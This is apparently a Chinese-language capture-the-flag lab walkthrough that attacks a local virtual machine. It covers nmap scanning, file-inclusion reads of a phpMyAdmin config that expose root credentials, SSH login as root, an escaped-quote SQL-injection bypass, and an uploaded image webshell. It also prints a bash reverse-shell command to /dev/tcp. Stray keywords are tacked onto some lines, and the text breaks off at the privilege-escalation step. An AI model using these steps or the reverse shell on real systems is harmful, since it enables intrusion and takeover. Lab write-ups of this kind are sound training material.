運行虛擬機直接上nmap掃描 獲取靶場ipphp
nmap 192.168.18.*mysql
開放端口 linux
192.168.18.143 打開頁面 爆破路徑 獲得sql
一次打開 發現 test.phpshell
要一個file 猜想多是文件包含 輸入數據庫
成功下載文件 bash
in.php 是phpinfo 文件tcp
ctril+f 搜索 SCRIPT_FILENAME 獲得跟路徑函數
把剛剛暴露的文件依次下載發現 c.php 裏面有鏈接mysql 的帳號密碼 在phpmyadmin 下可能存在默認配置文件編碼
在嘗試讀取phpmyadmin的默認配置文件 file=/var/www/phpmy/config.inc.php 獲得mysql root 的帳號密碼
root密碼:roottoor 既然已經獲取了 他的22端口開着能夠嘗試登陸
登陸成功 root權限
這裏我也能夠看到原先主頁的sql 注入 提示 下載源碼
對單引號作了轉義 這樣我想起來 一個ctf 題 也是對單引號進行轉義 直接利用 在單引號前面加個反斜槓對反斜槓進行轉義構建slq注入語句
成功注入登陸成功
進去查看頁面發現 panel.php 利用任意下載漏洞 下載 在前面源碼中也有包含 panel.php 文件的代碼
代碼審計發現 文件包含 上傳一張圖片馬讓後包含
利用以前掃描出來的路徑查看 /uploaded_images/
讓後直接包含
這裏 能夠在 馬裏寫一個get 請求反彈shell
cmd=echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash cmd 後門的命令須要url 編碼
鏈接
打開虛擬終端輸入 u'na'me -a ‘不影響命令讀取
差很少兩種提權思路